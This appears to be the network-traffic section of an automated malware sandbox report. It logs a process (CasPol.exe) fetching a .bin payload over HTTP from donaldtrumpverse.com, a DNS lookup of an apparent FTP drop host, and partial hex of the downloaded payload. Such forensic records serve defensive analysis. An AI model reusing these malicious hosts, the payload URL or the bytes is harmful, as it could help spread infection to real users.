                                                May 27, 2022 21:11:35.084944010 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.084956884 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085005999 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085022926 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085100889 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085131884 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085170984 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085216045 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085268021 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085333109 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085345030 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085349083 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085428953 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085463047 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085494041 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085582018 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085637093 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085730076 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.085747004 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085812092 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.085918903 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086010933 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086044073 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086061001 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086163998 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086206913 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086287975 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086340904 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086385965 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086395979 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086432934 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086457968 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086512089 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086555958 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086607933 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086653948 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086683035 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086714029 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086746931 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086795092 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086818933 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086865902 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086913109 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.086920977 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.086982012 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087038994 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087079048 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087093115 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087126017 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087155104 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087207079 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087232113 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087268114 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087285995 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087333918 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087393045 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087456942 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087488890 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087511063 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087515116 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087577105 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087600946 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087641001 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087672949 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087701082 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087752104 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087811947 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087831974 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087878942 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087879896 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087939024 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.087970018 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.087997913 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088027000 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088059902 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088119030 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088179111 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088191986 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088237047 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088252068 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088332891 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088346004 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088386059 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088407040 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088463068 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088515043 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088536978 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088577032 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088584900 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088639975 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088671923 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088700056 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088757038 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088772058 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088824034 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088881016 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088917017 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088936090 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.088943005 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.088999987 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089047909 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089097977 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089101076 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089159966 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089209080 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089255095 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089284897 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089303970 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089308023 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089333057 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089375019 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089431047 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089432001 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089489937 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089492083 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089550018 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089603901 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089658022 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089679003 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089695930 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089721918 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089777946 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089777946 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.089854956 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.089958906 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.090008974 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.213839054 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.213963032 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214029074 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214082003 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214085102 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.214143991 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.214190960 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214214087 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.214272976 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214291096 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.214342117 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214390993 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214438915 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214456081 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.214478970 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.214545965 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214553118 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.214607000 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.214641094 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.214808941 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:39.963301897 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:39.963530064 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:13:24.390722036 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:13:24.703001022 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:13:25.312419891 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:13:26.530725956 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:13:28.967642069 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:13:33.826033115 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:13:43.526869059 CEST4972780192.168.11.20103.211.219.10
                                                TimestampSource PortDest PortSource IPDest IP
                                                May 27, 2022 21:11:34.431529999 CEST5854553192.168.11.201.1.1.1
                                                May 27, 2022 21:11:34.445573092 CEST53585451.1.1.1192.168.11.20
                                                May 27, 2022 21:11:47.486834049 CEST5904853192.168.11.201.1.1.1
                                                May 27, 2022 21:11:48.490408897 CEST5904853192.168.11.209.9.9.9
                                                May 27, 2022 21:11:48.493509054 CEST53590489.9.9.9192.168.11.20
                                                May 27, 2022 21:11:48.605619907 CEST53590481.1.1.1192.168.11.20
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                May 27, 2022 21:11:34.431529999 CEST192.168.11.201.1.1.10x7fdStandard query (0)donaldtrumpverse.comA (IP address)IN (0x0001)
                                                May 27, 2022 21:11:47.486834049 CEST192.168.11.201.1.1.10xaacStandard query (0)ftp.solucionest.com.arA (IP address)IN (0x0001)
                                                May 27, 2022 21:11:48.490408897 CEST192.168.11.209.9.9.90xaacStandard query (0)ftp.solucionest.com.arA (IP address)IN (0x0001)
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                May 27, 2022 21:11:02.352399111 CEST1.1.1.1192.168.11.200xd8c5No error (0)www-bing-com.dual-a-0001.a-msedge.netdual-a-0001.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                May 27, 2022 21:11:02.352399111 CEST1.1.1.1192.168.11.200xd8c5No error (0)dual-a-0001.a-msedge.net13.107.21.200A (IP address)IN (0x0001)
                                                May 27, 2022 21:11:02.352399111 CEST1.1.1.1192.168.11.200xd8c5No error (0)dual-a-0001.a-msedge.net204.79.197.200A (IP address)IN (0x0001)
                                                May 27, 2022 21:11:02.671204090 CEST1.1.1.1192.168.11.200x5fd3No error (0)devcenterapi.azure-api.netapimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                May 27, 2022 21:11:02.671204090 CEST1.1.1.1192.168.11.200x5fd3No error (0)devcenterapi-eastus-01.regional.azure-api.netapimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                                May 27, 2022 21:11:03.301928043 CEST1.1.1.1192.168.11.200xb5ceNo error (0)evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.nete-0009.e-msedge.netCNAME (Canonical name)IN (0x0001)
                                                May 27, 2022 21:11:03.301928043 CEST1.1.1.1192.168.11.200xb5ceNo error (0)e-0009.e-msedge.net13.107.5.88A (IP address)IN (0x0001)
                                                May 27, 2022 21:11:34.445573092 CEST1.1.1.1192.168.11.200x7fdNo error (0)donaldtrumpverse.com103.211.219.10A (IP address)IN (0x0001)
                                                May 27, 2022 21:11:48.493509054 CEST9.9.9.9192.168.11.200xaacName error (3)ftp.solucionest.com.arnonenoneA (IP address)IN (0x0001)
                                                May 27, 2022 21:11:48.605619907 CEST1.1.1.1192.168.11.200xaacNo error (0)ftp.solucionest.com.arsolucionest.com.arCNAME (Canonical name)IN (0x0001)
                                                May 27, 2022 21:11:48.605619907 CEST1.1.1.1192.168.11.200xaacNo error (0)solucionest.com.ar192.185.112.181A (IP address)IN (0x0001)
                                                • donaldtrumpverse.com
                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.11.2049727103.211.219.1080C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                TimestampkBytes transferredDirectionData
                                                May 27, 2022 21:11:34.582463026 CEST343OUTGET /kO4_tiMHM116.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Host: donaldtrumpverse.com
                                                Cache-Control: no-cache
                                                May 27, 2022 21:11:34.707243919 CEST344INHTTP/1.1 200 OK
                                                Date: Fri, 27 May 2022 19:11:33 GMT
                                                Server: Apache
                                                Last-Modified: Fri, 27 May 2022 10:52:14 GMT
                                                Accept-Ranges: bytes
                                                Content-Length: 214592
                                                Content-Type: application/octet-stream
                                                Data Raw: 31 0c 0a 3d ff a2 66 24 b5 a5 1f 7b e8 56 53 c1 8c 5a 7b c7 a7 4e d8 e3 51 54 b9 54 56 0f a3 aa b4 fb 05 b0 87 c4 bf c1 35 2c 43 0a 99 90 07 d5 54 a9 f7 19 2a 8e c8 06 f0 52 da 55 56 05 e9 ed 17 b4 39 d9 4a f7 8b c1 8d f9 0a e9 8e 1e 72 4f 97 8b fa 95 e0 31 12 8f dc d3 7a 4c 70 68 49 8a 98 b3 7a d1 92 34 54 6f c3 81 f6 f9 3b d5 84 11 b7 3c 66 7b 59 a0 7d 3b 1d 0c 0b 27 f4 7c a9 43 57 b4 5c aa d7 11 ed c4 c2 ad 58 7f b5 c2 72 0c 67 08 46 5e b8 fe 7e 49 f8 80 55 be bc 89 a4 67 92 91 ca 48 1b 84 21 d4 95 aa 43 db a9 28 29 32 6a 86 44 4b b0 39 de ba e5 90 d5 7d c9 b3 e6 4a a1 88 01 99 82 43 0f 56 4c 49 20 cf 6b 71 a5 89 aa 19 8f 88 b2 07 73 8f 95 2f 24 28 db 5b 56 c6 c7 29 9e e9 18 58 f2 63 4a ab d0 7c 29 68 cd 85 30 25 24 06 31 8b e3 bd 74 3b 86 b1 fc c1 82 61 de 69 be 11 00 a6 ef 6e f5 eb 5d fd 64 d6 b4 cb 9f 7c 89 60 b3 ae 92 17 04 f6 4c eb 4b 2b 90 a1 68 92 3b da 92 3b a1 cf b7 50 0c 39 55 4e a6 cb 51 94 01 c3 d7 27 0a 75 18 de 8a c9 bb e4 7c 82 ff e5 ec 1f 19 73 d4 28 0f e0 71 00 ca 8a 3d 0e c5 54 e2 73 8f 4e 86 4d 06 85 d6 9f e5 b7 d0 45 42 fd 81 23 4c 71 72 64 dd 0d f1 dd e4 b4 ed 92 db 7c 87 b4 7b 77 04 95 d2 95 5c 32 90 ca 00 ae 02 ec 01 2d f6 29 51 80 ec a3 d6 c9 b7 b3 cd 97 79 78 b7 e8 5c 37 64 65 21 5a 28 59 7e 7c b6 9a 32 64 5b 81 a9 d3 e3 4b 1c d1 9e bf d8 c8 bc 31 3b 9b d1 c0 06 3b 82 fb 00 38 7f 06 a2 5c 35 31 a0 60 51 10 0e b9 50 3f 0c 00 b5 b3 78 9f e4 40 da 72 93 81 f1 c1 db 46 e9 55 01 de b7 57 93 82 1b 08 1b dc 78 13 3c 93 02 31 ed c3 62 ca f5 2a ce 80 25 f6 29 74 09 d6 5d cd 55 21 b2 2c 6a f3 6d e6 35 6a bd 70 f0 48 51 71 13 ed b1 d9 f7 41 a2 1d 6e b9 81 ce 89 7b 4b 6d 58 64 cb 0a 3d 7e 09 66 a3 ad ee fd 96 24 fe 8b 95 24 6b 12 36 85 28 9d bf 8f 19 17 10 bb 00 07 2a 84 e2 dc e9 63 32 4e 54 d4 81 10 dc a2 a4 31 8b 8a 2b 58 0e 0d 71 66 3e eb 44 4f fe e3 79 60 e9 1b 59 0d ac c0 c0 b0 2d cc 3c 20 be f3 9c 61 5e 15 45 66 23 7e 46 37 41 14 5c e9 d5 e6 2f 97 30 0f e1 bb a7 41 bb b0 26 58 15 45 3e 50 95 98 bf c7 32 dc 72 f6 98 8e 60 ba c8 31 9d 37 27 90 09 89 a4 01 ec 8a 4d 19 1b fe a2 4c 17 a3 65 26 b3 cf 0e 12 82 aa 18 db 09 37 3e 6c e9 e5 65 a0 82 2c 25 23 93 80 51 3d 19 e4 6a 00 ce 50 c1 4b e2 de 28 d7 a9 29 d6 3f 40 f1 b8 38 e3 c7 53 03 94 b0 d8 44 66 b4 38 93 9d bd 51 02 16 27 5d e5 5c d8 b4 e6 a8 11 d6 95 93 c7 ca 37 7f a9 c4 d0 5e 2c 7e 72 7c b0 c8 2b b8 75 b5 35 e0 5f c0 59 b1 f7 22 03 d5 c5 b4 ed b9 f5 cc 27 a2 e0 21 56 f2 98 46 cd 71 78 fb 76 71 89 81 62 7c cf ce a2 92 48 c0 ef 4b f7 8f 46 ad 71 dc 98 46 21 83 aa 20 76 30 45 72 6a 05 22 64 28 0b 03 71 9b c6 32 4e 17 a9 06 fd f4 f4 5e ad b9 39 5a e9 bf 27 48 db 89 d6 82 f9 0d f1 8f e0 5e 4d 04 89 d1 76 9e 32 12 8f 98 bc 76 4c 70 62 63 99 a8 b1 7a fd 92 34 54 6b c3 81 e7 ef 30 fe 9f 11 b0 2b 98 7a 75 a2 65 30 1d 0b 1d d9 75 50 ab 54 52 ab e1 bc 29 a4 c8 0b c8 17 72 d0 06 e7 26 64 0a 14 6b 2e ca 9b 33 28 a9 ef 75 f3 dd e7 ca 0d e6 b1 b9 3b 30 dd 4f ba b2 d4 d3 fa c1 65 62 19 07 ee 36 d0 9f 18 d1 a7 ca 90 d2 65 37 b2 ca 48 da cf 2a 7a cc 41 24 47 00 38 ab 85 79 71 a5 83 80 19 8f 9b 62 05 71 a6 9e 2e 2f 2e db 67 44 d0 cc 0a 85 e9 1f 4f 0c 62 88 f2 cb 77 29 4f db 7b 31 09 26 11 3a 8b a4 a5 8a 1a aa b3 d7 c1 a9 82 d8 41 ad 11 00 ac c5 7d c1 e9 5d d1 64 d6 b4 cc 9f dc 9b 76 b8 87 89 17 03 e1 b2 ea 65 29 c8 2f 68 95 3d 24 93 07 a3 d8 bc 50 1b 21 ab 5f 8a c9 7a 96 2a 20 17 22 0a 75 1a f6 9e c9 bb ee 56 91 5b bc ef 37 4e 73 d4 20 0f 80 63 16 f1 a4 26 0e c2 43 1c 72 a3 4c 9e 46 06
                                                Data Ascii: 1=f${VSZ{NQTTV5,CT*RUV9JrO1zLphIz4To;<f{Y};'|CW\XrgF^~IUgH!C()2jDK9}JCVLI kqs/$([V)XcJ|)h0%$1t;ain]d|`LK+h;;P9UNQ'u|s(q=TsNMEB#Lqrd|{w\2-)Qyx\7de!Z(Y~|2d[K1;;8\51`QP?x@rFUWx<1b*%)t]U!,jm5jpHQqAn{KmXd=~f$$k6(*c2NT1+Xqf>DOy`Y-< a^Ef#~F7A\/0A&XE>P2r`17'MLe&7>le,%#Q=jPK()?@8SDf8Q']\7^,~r|+u5_Y"'!VFqxvqb|HKFqF! v0Erj"d(q2N^9Z'H^Mv2vLpbcz4Tk0+zue0uPTR)r&dk.3(u;0Oeb6e7H*zA$G8yqbq./.gDObw)O{1&:A}]dve)/h=$P!_z* "uV[7Ns c&CrLF
                                                May 27, 2022 21:11:34.707329035 CEST346INData Raw: 82 c0 61 e4 9b d2 52 49 7d 85 3b be 70 5e 66 f6 0f da 3e e6 9c f8 92 db 76 ad a7 4b 75 04 d6 d2 95 5c 3b 90 ca 11 b8 09 c7 3a 2d f1 30 af 81 c0 ab fe c8 b7 b3 e6 bd 63 73 b7 ef 44 c9 65 49 2b 78 a4 5c 76 7c ad b7 2d 7d 50 81 ae c4 1d 4a 38 f3 86
                                                Data Ascii: aRI};p^f>vKu\;:-0csDeI+x\v|-}PJ8:;M6|^VqR>P/<xCrm]L7R6b!4"aIZ .rm,\ }v^AeVtzga&N4f/*>4#<+?c?q,
                                                May 27, 2022 21:11:34.707391977 CEST347INData Raw: 81 f6 fd 45 c1 84 11 b3 2a 4e 4b 59 a0 77 2d 26 bc 0a 27 74 54 f4 41 59 ad ce 86 d7 a5 ee 21 81 17 59 35 50 c0 26 64 04 53 5f 2e ca 9b 34 21 b1 b0 77 dd db cf e8 08 e6 bb 80 4f 39 f6 52 92 96 c3 2d f1 c5 5d 7a 12 0d cf 5e 3a 9e 34 d7 98 fa 90 d5
                                                Data Ascii: E*NKYw-&'tTAY!Y5P&dS_.4!wO9R-]z^:4w^B\k{|y# YUNR_w.N%$'[vzF#hNTI/h!UT4U^K#"4Tkf](^r~=@sY
                                                May 27, 2022 21:11:34.707488060 CEST349INData Raw: 72 f0 ae c2 48 bb c2 19 e4 1f 39 94 09 a6 a4 01 e0 88 9f 68 1d f8 8a 6e 97 a2 63 20 9f fd 09 12 88 88 c9 d9 09 3d 12 35 e1 e5 63 a8 2a 0c 25 23 9d 9c 0a 3d 19 e4 94 18 ce 50 c1 49 bd dc 3b e1 83 60 f8 3f 46 9e f3 38 e3 dc 6d 2a bd ab de 6b 3a 4a
                                                Data Ascii: rH9hnc =5c*%#=PI;`?F8m*k:J9[*{3X>iR}-,.~p;+wYq&=8 zEswY)~T\al8zW0.toup`*}~qr1rWzRIcGqZ/1BPlhIz4T
                                                May 27, 2022 21:11:34.707587957 CEST350INData Raw: b6 9a 4c 77 5b 81 ad c4 d0 64 3c 8e 9c bf 96 e0 90 31 3b 9d f9 ea 06 3b 84 fc 5d 28 1a 7e dc 44 1d 14 54 5b 54 cd d2 99 50 3f 24 11 b6 b3 72 b5 ca 40 da 78 4e 4c f1 c1 db 38 fa 55 01 da 8f 64 f6 e5 2e f7 70 ae 1b 12 31 9a 24 1c 6d c1 62 ac 54 23
                                                Data Ascii: Lw[d<1;;](~DT[TP?$r@xNL8Ud.p1$mbT#9)N"_S.j5jWktXVnBy5tXdfr~l&7-_6"(**c(.&Q23b'G<&aTWdD7G<2AE8x_p
                                                May 27, 2022 21:11:34.707676888 CEST351INData Raw: 7c 03 01 c1 54 2c 9e 32 bc 3b c1 90 df 6c cf b1 ce 22 f3 cd 07 b1 85 42 0c 5c 13 32 b3 a7 15 6a a5 89 ae 31 c3 88 52 0d 59 fe 9c 2e 29 00 95 67 55 cc a8 ad 9e e9 12 49 fa 72 a2 83 5e 7c 29 42 de 80 21 20 4b 88 31 8b a9 bf 5c 73 84 b1 fa eb c9 61
                                                Data Ascii: |T,2;l"B\2j1RY.)gUIr^|)B! K1\sacuY(`#dI+-+:&P3\v\QnQ'^2|bNs,~s8;U_GGB{h@qxw0q_mt|+QG}lIJe`9)ZE
                                                May 27, 2022 21:11:34.707755089 CEST353INData Raw: f1 b9 39 cf da 54 1c ca 92 d8 43 70 25 64 bf 9f af 86 13 17 36 b5 e3 fe 6d cc 99 a8 16 c4 43 36 e9 c8 1a 6e 87 36 ab 5a 2f 70 72 3b 11 c8 2b b8 52 8e 54 e2 5f e6 50 de a5 20 03 df c7 a6 f7 94 ff c8 36 a4 1a ae cd 9f f4 4d cd 7c 7f 03 73 4b 8f 18
                                                Data Ascii: 9TCp%d6mC6n6Z/pr;+RT_P 6M|sK\LaIDq,tup`Fpd(v(bd8KIrO%^diCag:p%Y(Z#K{Yn+'-eu8Y'Sm5li;d8-;/g
                                                May 27, 2022 21:11:34.707817078 CEST354INData Raw: ae 1b 19 2f 99 20 3e c5 71 62 aa fc 02 7d 86 25 fc 30 59 1e d6 4c d9 4f df b3 00 43 e1 7d ce 84 6a fd 7a d8 0c 7f 03 70 ee 71 ba f7 4b c1 ad 6e b9 8b 5d 9b 69 5a 47 ea 64 cb 44 4d ca 09 66 a9 be e8 e6 85 30 fe 9a 81 33 d5 13 1a c4 30 8e ab 8f 08
                                                Data Ascii: / >qb}%0YLOC}jzpqKn]iZGdDMf030E+>eWl;3K@'1B-(?MPA~F=W;!EmXO7a\13jTsf:i/47YPZ|;6A?
                                                May 27, 2022 21:11:34.707885981 CEST356INData Raw: 0c 5e 5b a3 bd 7e 3d 99 b8 ef c6 82 70 df 7f 40 10 2c a5 f8 7d f4 eb 4c f8 7b dd 4a ca b3 de a1 65 8b aa 6d e8 fb ff 23 88 49 2b da 4b bb 92 2b d0 b8 51 a3 e7 a0 50 1c 33 57 41 bc e3 85 94 01 c9 ef e7 08 75 1e f6 5f c9 bb ee 01 a8 6b be eb 35 4e
                                                Data Ascii: ^[~=p@,}L{Jem#I+K+QP3WAu_k5Ns;?r=*TeJL|BYd~~S2oB!)Q`M5|r=Yvv2d_ZA3@#.LaO11E_M|+uxrF[F{D;
                                                May 27, 2022 21:11:34.707982063 CEST357INData Raw: 20 7a f0 80 4d cd 76 6e 05 77 ae 8a 96 69 8f c9 d6 5c 83 64 c2 c4 54 dc 6c 39 b4 41 d9 9c 72 2b 83 aa 02 5c 23 64 58 b9 2b 22 62 22 0a 78 5b 8a d0 3d 4d 35 a9 01 e0 27 f9 70 d4 8b 32 5a ea 81 e3 49 f7 81 e7 8b 82 20 e9 71 e5 5a 9b 2d 8b fc bd c3
                                                Data Ascii: zMvnwi\dTl9Ar+\#dX+"b"x[=M5'p2ZI qZ-1zLzEw|z6;T<j<fqt;$('tvYz$S>P&dl)Tu"T-OA4}2H)BA(mbvRb+[XgT!_L)H-%$"
